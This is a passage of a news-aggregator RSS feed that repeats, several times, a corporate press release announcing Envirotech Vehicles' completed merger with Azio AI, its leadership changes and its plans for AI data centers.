<p>The Company and its directors and executive officers may be considered participants in the solicitation of proxies from EVTV’s stockholders with respect to the Conversion Proposal under the rules of the SEC. Information about the directors and executive officers of EVTV is set forth in its Annual Report on Form 10-K for the year ended December 31, 2025, which was filed with the SEC on April 13, 2026, and in subsequent Quarterly Reports on Form 10-Q and other documents filed by the Company from time to time with the SEC. Additional information regarding the persons who may be deemed participants in the proxy solicitation and a description of their direct and indirect interests, by security holdings or otherwise, will also be included in the proxy statement, and other relevant materials to be filed with the SEC when they become available. You may obtain free copies of these documents as described above.</p>



<p>¹ Source: International Data Corporation (IDC), “AI Infrastructure Spending Caps Historic Year at ~$90 Billion in Q4 2025; 2029 Spending to Eclipse $1 Trillion,” April 16, 2026. The Company has not independently verified the data or projections contained in this report, and there can be no assurance that the projections will be realized.</p>



<h5 class="wp-block-heading">Contact</h5>



<p><strong>Phoenix MGMT &amp; Consulting</strong></p>



<p><strong>Press@PhoenixMGMTConsulting.com</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Envirotech Vehicles Closes Merger with Azio AI Ahead of Schedule, Positioning Combined Company to Capture $487 Billion 2026 AI Infrastructure Opportunity]]></title>
<description><![CDATA[Revised transaction structure enables immediate closing, accelerating the Company’s strategic pivot toward AI data centers, enterprise GPU compute, and digital power infrastructure.



Envirotech Vehicles, Inc. (NASDAQ: EVTV) (“EVTV” or the “Company”) today announced the successful completion of ...]]></description>
<link>https://tsecurity.de/de/3651645/it-nachrichten/envirotech-vehicles-closes-merger-with-azio-ai-ahead-of-schedule-positioning-combined-company-to-capture-487-billion-2026-ai-infrastructure-opportunity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651645/it-nachrichten/envirotech-vehicles-closes-merger-with-azio-ai-ahead-of-schedule-positioning-combined-company-to-capture-487-billion-2026-ai-infrastructure-opportunity/</guid>
<pubDate>Tue, 07 Jul 2026 15:18:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><em>Revised transaction structure enables immediate closing, accelerating the Company’s strategic pivot toward AI data centers, enterprise GPU compute, and digital power infrastructure.</em></p>



<p><a href="https://www.evtvusa.com/" target="_blank" rel="noreferrer noopener">Envirotech Vehicles</a>, Inc. (NASDAQ: EVTV) (“EVTV” or the “Company”) today announced the successful completion of its merger with Azio AI Corporation (“Azio AI”) on July 2, 2026, paving the way for the Company to transform to an AI Datacenter Provider and meeting the growing market demand for artificial intelligence (“AI”) infrastructure, enterprise GPU compute, digital power solutions, data center development, and digital asset infrastructure; a market that the International Data Corporation (IDC) projects will reach $487 billion in global spending in 2026 and exceed $1 trillion by 2029.<a href="http://docs.google.com/blank">[1]</a> The transaction marks a defining milestone in the Company’s strategic transformation and establishes the foundation for its next phase of commercial execution and long-term growth.</p>



<p>The parties amended the proposed transaction structure to expedite the closing timeline, allowing the combined company to begin operating as a fully integrated public company significantly sooner than originally anticipated. The accelerated closing enables management to immediately focus on commercialization across its expanding AI Datacenter strategy.</p>



<p>With the merger complete and the combined company operating as one organization, management is now fully focused on commercial execution, infrastructure deployment, strategic growth initiatives, and creating long-term shareholder value.</p>



<p>Over the past several months, the Company advanced development activities at its South Texas site and deployed six megawatts of off-grid power for its modular data centers. The Company further secured rights to a 548-acre site with the capacity to scale up to 500 MW, supporting the future development of AI hyperscale data centers.</p>



<p>Management believes these achievements demonstrate that the combined company is entering its next phase with meaningful operational momentum already in place rather than beginning from a standing start. Infrastructure deployment is underway, customer commitments have already been established, commercial execution is actively progressing, and the Company’s corporate structure is now aligned with an operating platform built to support long-term expansion.</p>



<p>The completion of the merger comes at a time when investment in AI infrastructure continues to accelerate globally as enterprises increasingly require access to high-performance computing resources, GPU infrastructure, and scalable digital power solutions. Management believes the combined company is well positioned to capitalize on these long-term industry trends through a diversified infrastructure strategy designed to monetize power assets across multiple complementary revenue streams, including AI data centers, enterprise compute infrastructure, power hosting, and digital asset mining operations.</p>



<p>Following the closing of the transaction, the Company intends to continue expanding its AI Infrastructure strategy through AI data center development, enterprise GPU compute solutions, power hosting services, digital asset mining operations, strategic infrastructure investments, and additional commercial partnerships designed to maximize utilization of its power resources while creating multiple long-term revenue opportunities.</p>



<p>In connection with the closing of the merger, Phillip Oldridge has stepped down as Chief Executive Officer. Jason Maddox vacates the President position and is now the Chief Financial Officer. The Company’s Board of Directors appointed Simon Yu as President and Chris Young as Chief Executive Officer, effective immediately.</p>



<p>Mr. Yu is a serial entrepreneur and public markets operator with almost a decade of experience taking companies public, executing capital raises, and scaling businesses. He has previously served in founder, C-suite, and board roles at three publicly traded companies, two of which reached market capitalizations in excess of $1 billion. Mr. Yu has led legal, accounting, and advisory teams through Regulation A+ Tier 2 offerings, PCAOB audits, and public company reporting, alongside leading M&amp;A transactions. As an active early-stage venture investor, he has evaluated investment opportunities across artificial intelligence, SaaS, and B2B technology.</p>



<p>Mr. Young brings extensive experience in launching and leading public companies and investing in and advising emerging technology companies, with a particular focus on artificial intelligence, software innovation, and strategic growth initiatives. Prior to joining EVTV, he served as Chief Executive Officer of Clubhouse Media Group, a publicly traded social media company and an Entrepreneur in Residence at Amplify, where he worked alongside founders and venture-backed technology companies to accelerate commercialization and support the development of high-growth technology businesses.</p>



<p>“Today’s announcement represents far more than the completion of a merger—it marks the beginning of our next chapter,” said Chris Young, Chief Executive Officer of EVTV. “Over the past several months, our teams have been building the operational foundation of this business while simultaneously working toward completing this transaction. With the merger now finalized, we move forward as one company with one leadership team and one strategy, focused on executing against the opportunities in front of us. We believe demand for AI infrastructure, enterprise compute, and digital infrastructure will continue expanding for years to come. Our objective is to build a scalable platform capable of serving that demand while creating long-term value for our shareholders.”</p>



<p>Jason Maddox, Chief Financial Officer of EVTV, added, “Completing this transaction under the amended merger structure allows us to immediately focus on execution. We have already established meaningful operational momentum, and we believe operating as a unified public company enhances our ability to deploy infrastructure, serve customers, pursue strategic growth opportunities, and continue building long-term shareholder value.”</p>



<p>The transaction establishes a unified operating platform designed to support the Company’s long-term growth strategy through continued investment in AI infrastructure, enterprise computing, digital power assets, and digital infrastructure development. Management believes the completion of the merger provides the operational and organizational foundation necessary to pursue the next phase of commercialization while expanding its presence across some of the fastest-growing sectors of the global technology market.</p>



<h3 class="wp-block-heading"><strong>Transaction and Operational Highlights</strong></h3>



<ul class="wp-block-list">
<li>Successfully completed the merger with Azio AI pursuant to an amended and restated merger agreement.</li>



<li>Approximately six megawatts of off-grid digital infrastructure deployed at the Company’s South Texas development site.</li>



<li>Development footprint exceeding 548 acres with the potential to support up to 500 MW of AI infrastructure capacity.</li>



<li>Combined company positioned to accelerate commercialization across AI infrastructure, enterprise GPU compute, digital power solutions, and digital asset mining operations.</li>



<li>Merger consideration consisted of 2,655,157 shares of common stock and 973,450 shares of non-voting convertible preferred stock in exchange for 100% of outstanding capital stock of Azio AI, of which 194,807 shares of common stock were reserved for convertible notes of Azio AI assumed by the Company upon closing.</li>



<li>Each share of preferred stock convertible into 100 shares of Company common stock subject to stockholder approval.</li>



<li>Chris Young appointed Chief Executive Officer and Chairman of the Board.</li>



<li>Simon Yu appointed President.</li>



<li>Jason Maddox appointed Chief Financial Officer.</li>



<li>Phillip Oldridge stepped down as Chief Executive Officer.</li>
</ul>



<p><strong>About Envirotech Vehicles, Inc.</strong></p>



<p>Envirotech Vehicles, Inc. (NASDAQ: EVTV) is a technology infrastructure company focused on developing, owning, and operating artificial intelligence data centers, enterprise GPU compute infrastructure, digital power solutions, and digital asset mining operations. Following its acquisition of Azio AI, the Company operates an integrated AI infrastructure business encompassing AI data center development, the sale and distribution of enterprise GPU systems and server infrastructure, high-performance computing solutions, power hosting, and strategic technology investments, serving enterprise and institutional customers across domestic and international markets. Through this diversified AI infrastructure strategy, the Company is positioned to capitalize on the rapidly expanding global demand for AI infrastructure, compute capacity, digital power, and next-generation AI technologies.</p>



<p>For more information please visit: <a href="http://www.azioai.ai/" target="_blank" rel="noreferrer noopener">www.azioai.ai</a> and for potential partnerships contact: <a href="mailto:AI@PhoenixMGMTconsulting.com" target="_blank" rel="noreferrer noopener">AI@PhoenixMGMTconsulting.com</a></p>



<p><strong>Forward-Looking Statements</strong></p>



<p>This press release contains forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. In some cases, you can identify forward-looking statements by words such as “may,” “will,” “could,” “expect,” “anticipate,” “believe,” “estimate,” “project,” “intend,” “continue,” “potential,” “ongoing,” or the negative of these terms or other comparable terminology, although not all forward-looking statements contain these words. Forward-looking statements include statements regarding the Company’s ability to capitalize on accelerating demand for AI infrastructure, enterprise GPU compute, digital power solutions, data center development, and digital asset infrastructure; the Company’s plans to continue expanding its digital infrastructure platform through AI data center development, enterprise GPU compute solutions, power hosting services, digital asset mining operations, strategic infrastructure investments, and additional commercial partnerships; the Company’s ability to maximize utilization of its power resources while creating multiple long-term revenue opportunities; the ability to continue deploying modular digital infrastructure at the Company’s South Texas site; the anticipated deployment and scaling of NVIDIA B200 and B300 GPU systems; the ability to advance and execute against the Company’s commercial infrastructure pipeline; the anticipated development of the Company’s footprint; the ability to monetize power assets across multiple complementary revenue streams, including AI data centers, enterprise compute infrastructure, power hosting, and digital asset mining operations; customer demand for AI infrastructure, enterprise compute, and digital infrastructure; the Company’s ability to build a scalable platform designed to serve that demand and create long-term shareholder value; and the Company’s broader business strategy and long-term growth objectives.</p>



<p>These statements are based on current expectations and assumptions that involve risks and uncertainties that could cause actual results to differ materially. Most of these factors are outside the Company’s control and are difficult to predict. Factors that may affect actual results include, but are not limited to, the Company’s limited operating history within AI infrastructure and compute operations, project scope, engineering challenges, supply chain constraints, installation timelines, energy availability, finalization of site usage rights, regulatory considerations, equipment performance, ability to raise capital required for expansion activities, changes in digital asset markets, evolving compute demand, market conditions, the Company’s ability to successfully integrate the combined business following the completion of the merger, the risk that the anticipated benefits and synergies of the merger are not realized, the risk of unexpected costs, charges, or expenses resulting from or relating to the merger, potential adverse reactions or changes to business relationships resulting from the completion of the merger, risks related to the diversion of management’s attention from ongoing business operations during the post-closing integration period, the risk that required stockholder approval for the conversion of preferred stock issued in the merger as required by rules of The Nasdaq Stock Market LLC (the “Conversion Proposal”) is not obtained, and additional risks and uncertainties described in the Company’s most recent Annual Report on Form 10-K and subsequent Quarterly Reports on Form 10-Q filed with the SEC, which are available at www.sec.gov. The Company undertakes no obligation to update forward-looking statements except as required by law.</p>



<p><strong><em>Important Information About the Merger and Where to Find it</em></strong></p>



<p>The Company expects to file a proxy statement with the SEC relating to the Conversion Proposal. The definitive proxy statement will be sent to all Company stockholders. Before making any voting decision, investors and security-holders of the Company are urged to read the proxy statement and all other relevant documents filed or that will be filed with the SEC in connection with the Conversion Proposal as they become available because they will contain important information about the amended and restated merger agreement between the parties and the related transactions and the Conversion Proposal to be voted upon by the Company’s stockholders. Investors and security-holders will be able to obtain free copies of the proxy statement and all other relevant documents filed or that will be filed with the SEC by the Company through the website maintained by the SEC at www.sec.gov.</p>



<p><strong><em>Participants in the Solicitation</em></strong></p>



<p>The Company and its directors and executive officers may be considered participants in the solicitation of proxies from EVTV’s stockholders with respect to the Conversion Proposal under the rules of the SEC. Information about the directors and executive officers of EVTV is set forth in its Annual Report on Form 10-K for the year ended December 31, 2025, which was filed with the SEC on April 13, 2026, and in subsequent Quarterly Reports on Form 10-Q and other documents filed by the Company from time to time with the SEC. Additional information regarding the persons who may be deemed participants in the proxy solicitation and a description of their direct and indirect interests, by security holdings or otherwise, will also be included in the proxy statement, and other relevant materials to be filed with the SEC when they become available. You may obtain free copies of these documents as described above.</p>



<p>¹ Source: International Data Corporation (IDC), “AI Infrastructure Spending Caps Historic Year at ~$90 Billion in Q4 2025; 2029 Spending to Eclipse $1 Trillion,” April 16, 2026. The Company has not independently verified the data or projections contained in this report, and there can be no assurance that the projections will be realized.</p>



<h5 class="wp-block-heading">Contact</h5>



<p><strong>Phoenix MGMT &amp; Consulting</strong></p>



<p><strong>Press@PhoenixMGMTConsulting.com</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Envirotech Vehicles Closes Merger with Azio AI Ahead of Schedule, Positioning Combined Company to Capture $487 Billion 2026 AI Infrastructure Opportunity]]></title>
<description><![CDATA[Revised transaction structure enables immediate closing, accelerating the Company’s strategic pivot toward AI data centers, enterprise GPU compute, and digital power infrastructure.



Envirotech Vehicles, Inc. (NASDAQ: EVTV) (“EVTV” or the “Company”) today announced the successful completion of ...]]></description>
<link>https://tsecurity.de/de/3651613/it-security-nachrichten/envirotech-vehicles-closes-merger-with-azio-ai-ahead-of-schedule-positioning-combined-company-to-capture-487-billion-2026-ai-infrastructure-opportunity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651613/it-security-nachrichten/envirotech-vehicles-closes-merger-with-azio-ai-ahead-of-schedule-positioning-combined-company-to-capture-487-billion-2026-ai-infrastructure-opportunity/</guid>
<pubDate>Tue, 07 Jul 2026 15:09:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><em>Revised transaction structure enables immediate closing, accelerating the Company’s strategic pivot toward AI data centers, enterprise GPU compute, and digital power infrastructure.</em></p>



<p><a href="https://www.evtvusa.com/" target="_blank" rel="noreferrer noopener">Envirotech Vehicles</a>, Inc. (NASDAQ: EVTV) (“EVTV” or the “Company”) today announced the successful completion of its merger with Azio AI Corporation (“Azio AI”) on July 2, 2026, paving the way for the Company to transform to an AI Datacenter Provider and meeting the growing market demand for artificial intelligence (“AI”) infrastructure, enterprise GPU compute, digital power solutions, data center development, and digital asset infrastructure; a market that the International Data Corporation (IDC) projects will reach $487 billion in global spending in 2026 and exceed $1 trillion by 2029.<a href="http://docs.google.com/blank">[1]</a> The transaction marks a defining milestone in the Company’s strategic transformation and establishes the foundation for its next phase of commercial execution and long-term growth.</p>



<p>The parties amended the proposed transaction structure to expedite the closing timeline, allowing the combined company to begin operating as a fully integrated public company significantly sooner than originally anticipated. The accelerated closing enables management to immediately focus on commercialization across its expanding AI Datacenter strategy.</p>



<p>With the merger complete and the combined company operating as one organization, management is now fully focused on commercial execution, infrastructure deployment, strategic growth initiatives, and creating long-term shareholder value.</p>



<p>Over the past several months, the Company advanced development activities at its South Texas site and deployed six megawatts of off-grid power for its modular data centers. The Company further secured rights to a 548-acre site with the capacity to scale up to 500 MW, supporting the future development of AI hyperscale data centers.</p>



<p>Management believes these achievements demonstrate that the combined company is entering its next phase with meaningful operational momentum already in place rather than beginning from a standing start. Infrastructure deployment is underway, customer commitments have already been established, commercial execution is actively progressing, and the Company’s corporate structure is now aligned with an operating platform built to support long-term expansion.</p>



<p>The completion of the merger comes at a time when investment in AI infrastructure continues to accelerate globally as enterprises increasingly require access to high-performance computing resources, GPU infrastructure, and scalable digital power solutions. Management believes the combined company is well positioned to capitalize on these long-term industry trends through a diversified infrastructure strategy designed to monetize power assets across multiple complementary revenue streams, including AI data centers, enterprise compute infrastructure, power hosting, and digital asset mining operations.</p>



<p>Following the closing of the transaction, the Company intends to continue expanding its AI Infrastructure strategy through AI data center development, enterprise GPU compute solutions, power hosting services, digital asset mining operations, strategic infrastructure investments, and additional commercial partnerships designed to maximize utilization of its power resources while creating multiple long-term revenue opportunities.</p>



<p>In connection with the closing of the merger, Phillip Oldridge has stepped down as Chief Executive Officer. Jason Maddox vacates the President position and is now the Chief Financial Officer. The Company’s Board of Directors appointed Simon Yu as President and Chris Young as Chief Executive Officer, effective immediately.</p>



<p>Mr. Yu is a serial entrepreneur and public markets operator with almost a decade of experience taking companies public, executing capital raises, and scaling businesses. He has previously served in founder, C-suite, and board roles at three publicly traded companies, two of which reached market capitalizations in excess of $1 billion. Mr. Yu has led legal, accounting, and advisory teams through Regulation A+ Tier 2 offerings, PCAOB audits, and public company reporting, alongside leading M&amp;A transactions. As an active early-stage venture investor, he has evaluated investment opportunities across artificial intelligence, SaaS, and B2B technology.</p>



<p>Mr. Young brings extensive experience in launching and leading public companies and investing in and advising emerging technology companies, with a particular focus on artificial intelligence, software innovation, and strategic growth initiatives. Prior to joining EVTV, he served as Chief Executive Officer of Clubhouse Media Group, a publicly traded social media company and an Entrepreneur in Residence at Amplify, where he worked alongside founders and venture-backed technology companies to accelerate commercialization and support the development of high-growth technology businesses.</p>



<p>“Today’s announcement represents far more than the completion of a merger—it marks the beginning of our next chapter,” said Chris Young, Chief Executive Officer of EVTV. “Over the past several months, our teams have been building the operational foundation of this business while simultaneously working toward completing this transaction. With the merger now finalized, we move forward as one company with one leadership team and one strategy, focused on executing against the opportunities in front of us. We believe demand for AI infrastructure, enterprise compute, and digital infrastructure will continue expanding for years to come. Our objective is to build a scalable platform capable of serving that demand while creating long-term value for our shareholders.”</p>



<p>Jason Maddox, Chief Financial Officer of EVTV, added, “Completing this transaction under the amended merger structure allows us to immediately focus on execution. We have already established meaningful operational momentum, and we believe operating as a unified public company enhances our ability to deploy infrastructure, serve customers, pursue strategic growth opportunities, and continue building long-term shareholder value.”</p>



<p>The transaction establishes a unified operating platform designed to support the Company’s long-term growth strategy through continued investment in AI infrastructure, enterprise computing, digital power assets, and digital infrastructure development. Management believes the completion of the merger provides the operational and organizational foundation necessary to pursue the next phase of commercialization while expanding its presence across some of the fastest-growing sectors of the global technology market.</p>



<h3 class="wp-block-heading"><strong>Transaction and Operational Highlights</strong></h3>



<ul class="wp-block-list">
<li>Successfully completed the merger with Azio AI pursuant to an amended and restated merger agreement.</li>



<li>Approximately six megawatts of off-grid digital infrastructure deployed at the Company’s South Texas development site.</li>



<li>Development footprint exceeding 548 acres with the potential to support up to 500 MW of AI infrastructure capacity.</li>



<li>Combined company positioned to accelerate commercialization across AI infrastructure, enterprise GPU compute, digital power solutions, and digital asset mining operations.</li>



<li>Merger consideration consisted of 2,655,157 shares of common stock and 973,450 shares of non-voting convertible preferred stock in exchange for 100% of outstanding capital stock of Azio AI, of which 194,807 shares of common stock were reserved for convertible notes of Azio AI assumed by the Company upon closing.</li>



<li>Each share of preferred stock convertible into 100 shares of Company common stock subject to stockholder approval.</li>



<li>Chris Young appointed Chief Executive Officer and Chairman of the Board.</li>



<li>Simon Yu appointed President.</li>



<li>Jason Maddox appointed Chief Financial Officer.</li>



<li>Phillip Oldridge stepped down as Chief Executive Officer.</li>
</ul>



<p><strong>About Envirotech Vehicles, Inc.</strong></p>



<p>Envirotech Vehicles, Inc. (NASDAQ: EVTV) is a technology infrastructure company focused on developing, owning, and operating artificial intelligence data centers, enterprise GPU compute infrastructure, digital power solutions, and digital asset mining operations. Following its acquisition of Azio AI, the Company operates an integrated AI infrastructure business encompassing AI data center development, the sale and distribution of enterprise GPU systems and server infrastructure, high-performance computing solutions, power hosting, and strategic technology investments, serving enterprise and institutional customers across domestic and international markets. Through this diversified AI infrastructure strategy, the Company is positioned to capitalize on the rapidly expanding global demand for AI infrastructure, compute capacity, digital power, and next-generation AI technologies.</p>



<p>For more information please visit: <a href="http://www.azioai.ai/" target="_blank" rel="noreferrer noopener">www.azioai.ai</a> and for potential partnerships contact: <a href="mailto:AI@PhoenixMGMTconsulting.com" target="_blank" rel="noreferrer noopener">AI@PhoenixMGMTconsulting.com</a></p>



<p><strong>Forward-Looking Statements</strong></p>



<p>This press release contains forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. In some cases, you can identify forward-looking statements by words such as “may,” “will,” “could,” “expect,” “anticipate,” “believe,” “estimate,” “project,” “intend,” “continue,” “potential,” “ongoing,” or the negative of these terms or other comparable terminology, although not all forward-looking statements contain these words. Forward-looking statements include statements regarding the Company’s ability to capitalize on accelerating demand for AI infrastructure, enterprise GPU compute, digital power solutions, data center development, and digital asset infrastructure; the Company’s plans to continue expanding its digital infrastructure platform through AI data center development, enterprise GPU compute solutions, power hosting services, digital asset mining operations, strategic infrastructure investments, and additional commercial partnerships; the Company’s ability to maximize utilization of its power resources while creating multiple long-term revenue opportunities; the ability to continue deploying modular digital infrastructure at the Company’s South Texas site; the anticipated deployment and scaling of NVIDIA B200 and B300 GPU systems; the ability to advance and execute against the Company’s commercial infrastructure pipeline; the anticipated development of the Company’s footprint; the ability to monetize power assets across multiple complementary revenue streams, including AI data centers, enterprise compute infrastructure, power hosting, and digital asset mining operations; customer demand for AI infrastructure, enterprise compute, and digital infrastructure; the Company’s ability to build a scalable platform designed to serve that demand and create long-term shareholder value; and the Company’s broader business strategy and long-term growth objectives.</p>



<p>These statements are based on current expectations and assumptions that involve risks and uncertainties that could cause actual results to differ materially. Most of these factors are outside the Company’s control and are difficult to predict. Factors that may affect actual results include, but are not limited to, the Company’s limited operating history within AI infrastructure and compute operations, project scope, engineering challenges, supply chain constraints, installation timelines, energy availability, finalization of site usage rights, regulatory considerations, equipment performance, ability to raise capital required for expansion activities, changes in digital asset markets, evolving compute demand, market conditions, the Company’s ability to successfully integrate the combined business following the completion of the merger, the risk that the anticipated benefits and synergies of the merger are not realized, the risk of unexpected costs, charges, or expenses resulting from or relating to the merger, potential adverse reactions or changes to business relationships resulting from the completion of the merger, risks related to the diversion of management’s attention from ongoing business operations during the post-closing integration period, the risk that required stockholder approval for the conversion of preferred stock issued in the merger as required by rules of The Nasdaq Stock Market LLC (the “Conversion Proposal”) is not obtained, and additional risks and uncertainties described in the Company’s most recent Annual Report on Form 10-K and subsequent Quarterly Reports on Form 10-Q filed with the SEC, which are available at www.sec.gov. The Company undertakes no obligation to update forward-looking statements except as required by law.</p>



<p><strong><em>Important Information About the Merger and Where to Find it</em></strong></p>



<p>The Company expects to file a proxy statement with the SEC relating to the Conversion Proposal. The definitive proxy statement will be sent to all Company stockholders. Before making any voting decision, investors and security-holders of the Company are urged to read the proxy statement and all other relevant documents filed or that will be filed with the SEC in connection with the Conversion Proposal as they become available because they will contain important information about the amended and restated merger agreement between the parties and the related transactions and the Conversion Proposal to be voted upon by the Company’s stockholders. Investors and security-holders will be able to obtain free copies of the proxy statement and all other relevant documents filed or that will be filed with the SEC by the Company through the website maintained by the SEC at www.sec.gov.</p>



<p><strong><em>Participants in the Solicitation</em></strong></p>



<p>The Company and its directors and executive officers may be considered participants in the solicitation of proxies from EVTV’s stockholders with respect to the Conversion Proposal under the rules of the SEC. Information about the directors and executive officers of EVTV is set forth in its Annual Report on Form 10-K for the year ended December 31, 2025, which was filed with the SEC on April 13, 2026, and in subsequent Quarterly Reports on Form 10-Q and other documents filed by the Company from time to time with the SEC. Additional information regarding the persons who may be deemed participants in the proxy solicitation and a description of their direct and indirect interests, by security holdings or otherwise, will also be included in the proxy statement, and other relevant materials to be filed with the SEC when they become available. You may obtain free copies of these documents as described above.</p>



<p>¹ Source: International Data Corporation (IDC), “AI Infrastructure Spending Caps Historic Year at ~$90 Billion in Q4 2025; 2029 Spending to Eclipse $1 Trillion,” April 16, 2026. The Company has not independently verified the data or projections contained in this report, and there can be no assurance that the projections will be realized.</p>



<h5 class="wp-block-heading">Contact</h5>



<p><strong>Phoenix MGMT &amp; Consulting</strong></p>



<p><strong>Press@PhoenixMGMTConsulting.com</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Envirotech Vehicles Closes Merger with Azio AI Ahead of Schedule, Positioning Combined Company to Capture $487 Billion 2026 AI Infrastructure Opportunity]]></title>
<description><![CDATA[Revised transaction structure enables immediate closing, accelerating the Company’s strategic pivot toward AI data centers, enterprise GPU compute, and digital power infrastructure.



Envirotech Vehicles, Inc. (NASDAQ: EVTV) (“EVTV” or the “Company”) today announced the successful completion of ...]]></description>
<link>https://tsecurity.de/de/3651556/it-security-nachrichten/envirotech-vehicles-closes-merger-with-azio-ai-ahead-of-schedule-positioning-combined-company-to-capture-487-billion-2026-ai-infrastructure-opportunity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651556/it-security-nachrichten/envirotech-vehicles-closes-merger-with-azio-ai-ahead-of-schedule-positioning-combined-company-to-capture-487-billion-2026-ai-infrastructure-opportunity/</guid>
<pubDate>Tue, 07 Jul 2026 14:52:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><em>Revised transaction structure enables immediate closing, accelerating the Company’s strategic pivot toward AI data centers, enterprise GPU compute, and digital power infrastructure.</em></p>



<p><a href="https://www.evtvusa.com/" target="_blank" rel="sponsored">Envirotech Vehicles</a>, Inc. (NASDAQ: EVTV) (“EVTV” or the “Company”) today announced the successful completion of its merger with Azio AI Corporation (“Azio AI”) on July 2, 2026, paving the way for the Company to transform to an AI Datacenter Provider and meeting the growing market demand for artificial intelligence (“AI”) infrastructure, enterprise GPU compute, digital power solutions, data center development, and digital asset infrastructure; a market that the International Data Corporation (IDC) projects will reach $487 billion in global spending in 2026 and exceed $1 trillion by 2029.<a href="http://docs.google.com/blank" rel="sponsored">[1]</a> The transaction marks a defining milestone in the Company’s strategic transformation and establishes the foundation for its next phase of commercial execution and long-term growth.</p>



<p>The parties amended the proposed transaction structure to expedite the closing timeline, allowing the combined company to begin operating as a fully integrated public company significantly sooner than originally anticipated. The accelerated closing enables management to immediately focus on commercialization across its expanding AI Datacenter strategy.</p>



<p>With the merger complete and the combined company operating as one organization, management is now fully focused on commercial execution, infrastructure deployment, strategic growth initiatives, and creating long-term shareholder value.</p>



<p>Over the past several months, the Company advanced development activities at its South Texas site and deployed six megawatts of off-grid power for its modular data centers. The Company further secured rights to a 548-acre site with the capacity to scale up to 500 MW, supporting the future development of AI hyperscale data centers.</p>



<p>Management believes these achievements demonstrate that the combined company is entering its next phase with meaningful operational momentum already in place rather than beginning from a standing start. Infrastructure deployment is underway, customer commitments have already been established, commercial execution is actively progressing, and the Company’s corporate structure is now aligned with an operating platform built to support long-term expansion.</p>



<p>The completion of the merger comes at a time when investment in AI infrastructure continues to accelerate globally as enterprises increasingly require access to high-performance computing resources, GPU infrastructure, and scalable digital power solutions. Management believes the combined company is well positioned to capitalize on these long-term industry trends through a diversified infrastructure strategy designed to monetize power assets across multiple complementary revenue streams, including AI data centers, enterprise compute infrastructure, power hosting, and digital asset mining operations.</p>



<p>Following the closing of the transaction, the Company intends to continue expanding its AI Infrastructure strategy through AI data center development, enterprise GPU compute solutions, power hosting services, digital asset mining operations, strategic infrastructure investments, and additional commercial partnerships designed to maximize utilization of its power resources while creating multiple long-term revenue opportunities.</p>



<p>In connection with the closing of the merger, Phillip Oldridge has stepped down as Chief Executive Officer. Jason Maddox vacates the President position and is now the Chief Financial Officer. The Company’s Board of Directors appointed Simon Yu as President and Chris Young as Chief Executive Officer, effective immediately.</p>



<p>Mr. Yu is a serial entrepreneur and public markets operator with almost a decade of experience taking companies public, executing capital raises, and scaling businesses. He has previously served in founder, C-suite, and board roles at three publicly traded companies, two of which reached market capitalizations in excess of $1 billion. Mr. Yu has led legal, accounting, and advisory teams through Regulation A+ Tier 2 offerings, PCAOB audits, and public company reporting, alongside leading M&amp;A transactions. As an active early-stage venture investor, he has evaluated investment opportunities across artificial intelligence, SaaS, and B2B technology.</p>



<p>Mr. Young brings extensive experience in launching and leading public companies and investing in and advising emerging technology companies, with a particular focus on artificial intelligence, software innovation, and strategic growth initiatives. Prior to joining EVTV, he served as Chief Executive Officer of Clubhouse Media Group, a publicly traded social media company and an Entrepreneur in Residence at Amplify, where he worked alongside founders and venture-backed technology companies to accelerate commercialization and support the development of high-growth technology businesses.</p>



<p>“Today’s announcement represents far more than the completion of a merger—it marks the beginning of our next chapter,” said Chris Young, Chief Executive Officer of EVTV. “Over the past several months, our teams have been building the operational foundation of this business while simultaneously working toward completing this transaction. With the merger now finalized, we move forward as one company with one leadership team and one strategy, focused on executing against the opportunities in front of us. We believe demand for AI infrastructure, enterprise compute, and digital infrastructure will continue expanding for years to come. Our objective is to build a scalable platform capable of serving that demand while creating long-term value for our shareholders.”</p>



<p>Jason Maddox, Chief Financial Officer of EVTV, added, “Completing this transaction under the amended merger structure allows us to immediately focus on execution. We have already established meaningful operational momentum, and we believe operating as a unified public company enhances our ability to deploy infrastructure, serve customers, pursue strategic growth opportunities, and continue building long-term shareholder value.”</p>



<p>The transaction establishes a unified operating platform designed to support the Company’s long-term growth strategy through continued investment in AI infrastructure, enterprise computing, digital power assets, and digital infrastructure development. Management believes the completion of the merger provides the operational and organizational foundation necessary to pursue the next phase of commercialization while expanding its presence across some of the fastest-growing sectors of the global technology market.</p>



<p><strong>Transaction and Operational Highlights</strong></p>



<ul class="wp-block-list">
<li>Successfully completed the merger with Azio AI pursuant to an amended and restated merger agreement.</li>



<li>Approximately six megawatts of off-grid digital infrastructure deployed at the Company’s South Texas development site.</li>



<li>Development footprint exceeding 548 acres with the potential to support up to 500 MW of AI infrastructure capacity.</li>



<li>Combined company positioned to accelerate commercialization across AI infrastructure, enterprise GPU compute, digital power solutions, and digital asset mining operations.</li>



<li>Merger consideration consisted of 2,655,157 shares of common stock and 973,450 shares of non-voting convertible preferred stock in exchange for 100% of outstanding capital stock of Azio AI, of which 194,807 shares of common stock were reserved for convertible notes of Azio AI assumed by the Company upon closing.</li>



